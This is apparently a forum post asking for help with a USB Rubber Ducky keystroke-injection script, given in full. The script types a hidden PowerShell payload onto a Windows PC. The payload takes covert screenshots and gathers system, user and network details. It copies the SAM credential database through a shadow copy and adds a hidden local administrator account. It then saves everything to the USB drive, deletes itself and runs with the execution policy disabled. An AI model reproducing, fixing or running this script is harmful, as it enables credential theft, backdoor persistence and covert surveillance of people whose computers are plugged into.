Jump to content

Recommended Posts

I'm trying to create a script that allows me to recognize some info from a windows PC and save them directly on rubber ducky
it's possible?
what am I wrong with this script?

REM Recon
DELAY 200
GUI r
DELAY 100
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 200
ALT y
DELAY 200
ENTER
ALT SPACE
DELAY 100
STRING m
DELAY 100
DOWNARROW
REPEAT 100
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item  ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING $jpegSaveDir = New-Item $fileSaveDir'\Screenshots' -ItemType Directory
ENTER
STRING $x = 0
ENTER
STRING do { Start-Sleep -Seconds 60
ENTER
STRING $jpegName = (get-date).ToString('HHmmss')
ENTER
STRING $File = "$jpegSaveDir\$jpegName.bmp"
ENTER
STRING Add-Type -AssemblyName System.Windows.Forms
ENTER
STRING Add-type -AssemblyName System.Drawing
ENTER
STRING $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
ENTER
STRING $Width = $Screen.Width
ENTER
STRING $Height = $Screen.Height
ENTER
STRING $Left = $Screen.Left
ENTER
STRING $Top = $Screen.Top
ENTER
STRING $bitmap = New-Object System.Drawing.Bitmap $Width, $Height
ENTER
STRING $graphic = [System.Drawing.Graphics]::FromImage($bitmap)
ENTER
STRING $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
ENTER
STRING $bitmap.Save($File)
ENTER
STRING $x++  } while ($x -ne 8);
ENTER
STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem  
ENTER
STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime  
ENTER
STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME)  
ENTER
STRING $SerialNo = $SysSerialNo.SerialNumber  
ENTER
STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model  
ENTER
STRING $SysManufacturer = $SysInfo.Manufacturer  
ENTER
STRING $SysModel = $SysInfo.Model
ENTER
STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption
ENTER
STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"
ENTER
STRING $HD = [math]::truncate($disk.Size / 1GB)
ENTER
STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB)
ENTER
STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select  TotalVisibleMemorySize
ENTER
STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB)
ENTER
STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name
ENTER
STRING $Cpu = $SysCpu.Name
ENTER  
STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber
ENTER
STRING $HardSerialNo = $HardSerial.SerialNumber
ENTER  
STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name
ENTER
STRING $graphicsCard = gwmi win32_VideoController |select Name
ENTER
STRING $graphics = $graphicsCard.Name
ENTER
STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1
ENTER
STRING $DriveLetter = $CDDrive.Drive
ENTER
STRING $DriveName = $CDDrive.Caption
ENTER
STRING $Disk = $DriveLetter + '\' + $DriveName
ENTER
STRING $Firewall = New-Object -com HNetCfg.FwMgr  
ENTER
STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile  
ENTER
STRING $FireProfile = $FireProfile.FirewallEnabled
ENTER
STRING $Report = $Report  + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"  
ENTER
STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired  
ENTER
STRING $UserType = $UserInfo.AccountType
ENTER
STRING $UserSid = $UserInfo.SID
ENTER  
STRING $UserPass = $UserInfo.PasswordRequired
ENTER
STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')
ENTER
STRING $Report =  $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>"
ENTER  
STRING $Report = $Report + '</div>'
ENTER
STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible')
ENTER
STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }
ENTER
STRING $addSlash  = $shadow.DeviceObject + '\'
ENTER
STRING cmd /c mklink C:\shadowcopy $addSlash
ENTER
STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir
ENTER
STRING Remove-Item -recurse -force 'C:\shadowcopy'
ENTER
STRING $Report =  $Report + '<div id=center><h3> Installed Updates</h3>'  
ENTER
STRING $Report =  $Report +  (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html   Description, HotFixId,Installedon,InstalledBy)
ENTER  
STRING $Report = $Report + '</div>'
ENTER
STRING $Computer = $env:COMPUTERNAME
ENTER
STRING $PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080
ENTER
STRING $Report = $Report  + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>'
ENTER
STRING foreach ($PortNumber in $PortList) {
ENTER
STRING $PortCheck = New-Object Net.Sockets.TcpClient
ENTER
STRING $PortCheck.Connect($Computer, $PortNumber)
ENTER
STRING if ($PortCheck.Connected) {
ENTER
STRING $Report = $Report  +  '<tr><td><b><font color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'}
ENTER
STRING else {$Report = $Report  +  '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}}
ENTER
STRING $Report = $Report + '</table></div>'
ENTER
STRING $Report =  $Report + '<div id=center><h3> Installed Programs</h3> '
ENTER
STRING $Report =  $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html  Name, Version,InstallDate)
ENTER
STRING $Report = $Report + '</table></div>'
ENTER
STRING  $u = 0
ENTER
STRING $allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace)
ENTER
STRING $Report =  $Report + '<div id=right><h3>USB Devices</h3><table>'
ENTER
STRING do {
ENTER
STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)
ENTER
STRING $Report = $Report + "<tr><td>Drive Name: </td><td> " + $allUsb[$u].Name + $allUsb[$u].Label + "</td><td>Free Space: </td><td>" + $gbUSB + "GB</td></tr>"
ENTER
STRING Write-Output $fullUSB
ENTER
STRING $u ++
ENTER
STRING } while ($u -lt $allUsb.Count)
ENTER
STRING $Report = $Report + '</table></div>'
ENTER
STRING $Report =  $Report + '<div id=left><h3>Shared Drives/Devices</h3>'
ENTER
STRING $Report =  $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path)
ENTER  
STRING $Report = $Report + '</div>'
ENTER
STRING $Report =  $Report + '<div id=center><h3>Network Information</h3>'
ENTER
STRING $Report =  $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html)
ENTER  
STRING $Report = $Report + '</table></div>'
ENTER
STRING $Report =  $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>'
ENTER
STRING $Report =  $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)
ENTER  
STRING $Report = $Report + '</div>'
ENTER
STRING Net User test test1   /ADD
ENTER
STRING Net LocalGroup Administrators test  /ADD  
ENTER
DELAY 500
STRING reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v test /t REG_DWORD /d 0 /f
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING $usbPresent = 'False'
ENTER
STRING do {
ENTER
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq  'f:\}' | Measure
ENTER
STRING if ($present.Count -ge 1){
ENTER
STRING $usbPresent = 'True' }Else {
ENTER
STRING $usbPresent = 'False'}}
ENTER
STRING until ($usbPresent -eq 'True')
ENTER
STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq  'f:\}' | select Name
ENTER
STRING move-item c:\Windows\Report.zip $driveLetter.Name
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 750  
STRING C:\Windows\config-86652.ps1
ENTER
DELAY 100
ALT F4
DELAY 100
GUI r
DELAY 200   
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 200 
ALT y
DELAY 200  
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750  
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 750  
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-86652.ps1
ENTER
STRING exit
DELAY 100
ENTER

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...